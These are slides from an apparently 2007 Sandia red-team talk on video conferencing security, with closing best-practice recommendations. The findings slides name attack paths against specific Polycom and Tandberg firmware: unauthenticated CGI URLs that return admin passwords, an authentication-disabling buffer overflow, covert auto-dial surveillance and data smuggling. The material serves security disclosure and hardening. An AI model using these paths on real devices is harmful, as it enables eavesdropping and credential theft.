Who is Watching You? Video Conferencing Security

Who is Watching You? Video Conferencing Security Navid Jam Member of Technical Staff March 1, 2007 SAND# 2007-1115C Computer and Network Security Security Systems and Technology Video Conference and Collaborative Technologies Sandia is a multiprogram laboratory operated by Sandia Corporation, a Lockheed Martin Company, for the United States Department of Energy s National Nuclear Security Administration under contract DE-AC04-94AL85000. 1

Something to think about Communication Devices Let s Compare 2

Something to think about Communication Devices Vs. Polycom VSX 8000 3

Something to think about Communication Devices Vs. Polycom VSX 8000 Linksys WVC200 Wireless PTZ Internet Camera with Audio 4

Something to think about Communication Devices Vs. Polycom VSX 8000 MSRP $12,999 Linksys WVC200 Wireless PTZ Internet Camera with Audio Difference of: MSRP $12,700 MSRP $299 5

Embedded Devices Specialized hardware and software TCP/IP That have embedded beneficial services like: FTP Telnet HTTP SNMP H.323 Etc. How secure are these devices? 6

Ocean s 11 Intelligence Gathering Hacking / Information Operations Using IT systems to aid physical attack 7

Agenda Introduction The Center for Cyber Defenders (CCD) Methodology Findings Best Practices Future Research Conclusion 8

Introduction Embedded IP devices Using video conferencing as case study Video Conferencing usage has increased Video Conferencing Technology (VCT) Vendors pushing new features IP VoIP Data collaboration Etc Little focus on security We have AES encryption, therefore we are secure Who is responsible for securing these devices? Networking Computer Security Video Conferencing What about patch management? 9

VCT Architecture 10

Basic Protocols H.320 ISDN H.323 Video over IP T.120 Collaborative data sharing HD Video, POTS, etc. 11

15-20 students a year Focus on information security Malicious Code Analysis Network Programming OS Analysis Vulnerability Assessments Forefront of IP Video Conferencing Security Highlighting the work done by students and other staff at SNL over the past 4 years Codec s (Polycom and Tandberg) Desktop Camera s Network Infrastructure (Polycom, Tandberg & Cisco) Stay tuned for future announcements 12

Methodology Knowing Your Adversary What is your threat? 13

Red Teaming - Methodology Six phases of research, planning, and attacking 14

Gain Administrative Access Attack Tree 15

Goals Attack with the following goals: Compromise the system any way possible Conduct an independent assessment of the vulnerabilities and risks of using Video Conferencing Technology Develop industry best practices Analyze the site implementation Develop tools to aid in vulnerability assessment of VCT devices 16

Overview of Findings Gaining Administrative Access Diagnostics Mode Packet Sniffing Web Vulnerabilities Surveillance Capturing and Viewing Traffic Auto Calling Encryption Audio and Video Streaming Making Surveillance Covert Transmitting Information to an Outside Source Hosting Files ISDN / IP Enabling and Concealing Services Other Attacks Will only vaguely describe some 17

Gaining Administrative Access Gaining Administrative Access Diagnostics Mode Packet Sniffing Web Vulnerabilities 18

Gain Administrative Access Diagnostics Mode BootUI mode Physical Access Hold power button for 10 seconds while booting up Remote Force BootUI mode with buffer overflow 2005, Software Version# 7.5.2d Attack BootUI Copy off the contents of flash to single file Run strings and grep on file Can t prevent physical attack Unable to log BootUI mode s occurrence 19

Gain Administrative Access Diagnostics Mode Analyzing a chip dump Also saves password history 20

Gain Administrative Access Packet Sniffing Telnet and FTP passwords are unencrypted which makes it easy to sniff the network and obtain them 21

Gain Administrative Access Web Vulnerabilities Unauthenticated CGI s Buffer Overflows Get requests Post requests 22

Gain Administrative Access Unauthenticated CGI s 2004, Software Version# 6.0.1 http://<host>/getsekure.cgi Returns administrative password http://<host>/getaddressbook.cgi Returns a list of all addresses in the address book http://<host>/getcalllog.cgi Returns a list of all video calls the device has participated 23

Exploiting a buffer overflow vulnerability Gain Administrative Access Buffer Overflows 2005, Software Version# 7.5.2d Upload a single file to the web server 24

Exploiting a buffer overflow vulnerability (contd.) Gain Administrative Access Buffer Overflows 2005, Software Version# 7.5.2d The system stops requiring authentication for Telnet and FTP connections (until next reboot) 25

Gain Administrative Access Get / Post Requests 2006, Software Version#8.5 Able to retrieve admin password unauthenticated Able to change admin password unauthenticated Some.file has this comment in code /*. We may want to look into making this more secure */ Number of web vulnerabilities New Security Mode features Encryption features, HTTPS, TelnetS, FTPS etc. Perform all attacks / steaming encrypted 26

Gain Administrative Access What does this mean? Having administrative rights gives a person complete control of the Polycom device, including: Placing script on device that will automatically dial a third device when called Configure the device to accept any call Smuggle file to an outside network using the Polycom device Change password, preventing legitimate users from using the device Forcing the device to use a gatekeeper which can falsify audio and video 27

Surveillance Surveillance Capturing and Viewing Traffic Auto Calling Encryption Video and Audio Streaming Covert Audio Streaming Making Surveillance Covert 28

Surveillance Capturing and Viewing Traffic Capture with Ethereal Decode and view with Observer 29

Surveillance Capturing and Viewing Traffic 30

Surveillance Auto Calling Use scripts to initiate calls to third party Livermore Albuquerque Attacker 31

Surveillance Auto Calling Use scripts to initiate calls to third party Albuquerque Viewstation in Albuquerque has a previously loaded script 32

Surveillance Auto Calling Use scripts to initiate calls to third party Livermore Albuquerque Livermore calls Albuquerque 33

Surveillance Auto Calling Use scripts to initiate calls to third party Livermore Albuquerque Attacker Viewstation in Albuquerque runs the script which calls Attacker s Viewstation 34

Surveillance Encryption Video & Audio Streaming 2006, Software Version# 8.5 Making changes through encrypted channels Streaming Audio and Video Making audio streaming covert 35

Surveillance What does this mean? Any conference that uses VCT devices on an unencrypted network can be recorded and replayed by anyone connected to that network Any conference that uses Polycom VCT devices can be eavesdropped on using auto dialing with ISDN and IP 36

Transmitting Information to an Outside Source Hosting Files Upload files unauthenticated files to the Polycom web server Upload files to the Polycom with FTP and an administrative password. Maximum file size that can be uploaded: Viewstation VS Software Release 7.2.4 1MB Viewstation FX Software Release 5.1 FX 3MB VS 4000 Software Release 6.0.4 FX 3MB VSX 8000 Software Release 8.5 3MB 37

Transmitting Information to an Outside Source Hosting Files 2005, Software Version# 7.5.2d Telnet to the web services (port 80) and use the PUT command Initial attempts caused the device to crash erratically 38

Transmitting Information to an Outside Source IP / ISDN System files can be accessed and modified. Fooling OS to think files are system files by giving them the same names ISDN line can be used to transfer data outside 2006, Software Version# 8.5 IP traffic can be encrypted as well Enabling and concealing services 39

Transmitting Information to an Outside Source What does this mean? Information can be passed to an outside source using the Polycom VCT devices, such as: Sensitive information a user intentionally added to system files Configuration files Call logs Administrator password 40

Other Attacks Deny Service Inject / Falsify Video Using: Gatekeepers Gateways Use VCT devices a launching point for other attacks Compromised Host Java / Java Script Programs Port Scanners Vulnerability Scanners Enterprise Management 41

What About Tandberg? 2004, Software Version# Classic Model E2.1 and E4.0 Not Perfect... all pages on the Tandberg device could be requested if the leading / is left off the get request sent to the HTTP server get Request Rejected 42

Tandberg Continued get Request Accepted without Authentication 43

Tandberg Continued Administrator Password Set using get and plugin_set 44

What About Tandberg Some problems in 2004 Auto Dialing Uploading / Transmitting files (9 megabytes) Surveillance Better vendor support wrt security More stable IP stack Targeted attacks ongoing 45

Best Practices for VCT Devices Device Physically secure the devices Update firmware Disable all unneeded and rarely used protocols (i.e. FTP, Telnet, SNMP, and HTTP*) Disable auto answer for incoming calls Develop a strong administrator password and change it periodically Restart the devices on a weekly basis Take a snapshot (MD5, SHA[n]) of all of the system files and periodically verify that they have not been modified (or just reinstall the OS periodically) 46

Best Practices for VCT Devices Network Use Access Control Lists (ACL's) and/or routers to help secure the network on which the devices operate Any computer (IP) allowed past the ACL needs to be well guarded as to make sure surveillance software is not installed that could allow that computer to sniff the traffic and send it offsite Use VLAN's Encryption should be used on the network across all WAN links as well as internally for important calls Ensure the router/switch/firewall is kept up to date 47

Best Practices for VCT Devices Management Server Keep the server up to date with security patches Limit access to the server via strict ACL's Encrypt traffic between the management clients and devices 48

Best Practices for VCT Devices Policy Shut off the devices when they are not in use Develop and enforce a strong password policy Develop policies that forbid circumventing network security to sniff/monitor traffic Develop working relationship and information sharing with vendor based on Service Level Agreements Conduct routine security audits of devices Conduct periodic reviews/scans to audit ACL's and ensure they are working 49

Sandia Security Switch (S3) Patent Pending TSCM approved 62 50

Open PCS Architecture for Interoperable Design (OPSAID) Designed for add-on security for embedded devices SCADA Video Conferencing Legacy systems Etc. Provides for: Secure management / configuration Logging and monitoring capabilities Firewalls IDS Encryption 51

Further Areas for Research Impact of connecting with other vulnerable Codec s Inserting malicious code into video stream ISDN Gatekeepers, Gateway s and Bridges as another means of attack T.120 security issues Room Controllers Systematic approach to security Codec Network Conference Room / Desktop 52

Conclusion Many benefits to video conferencing Polycom devices continue to be insecure Polycom is making a number of security improvements, however, more of a bandage than a comprehensive security overhaul Tandberg has better vendor support wrt security Technical and policy based recommendations to help mitigate some of the current threat Multilayered approach to security ACL's VLAN's Encryption User training 53

Navid Jam njam@sandia.gov 925-294-6379 Questions / Comments 54

Environment 55

Gather Information About Devices Google White papers Documentation Nessus Other vulnerability scanners Spiders Social engineering etc 56

S3 Block Diagram 57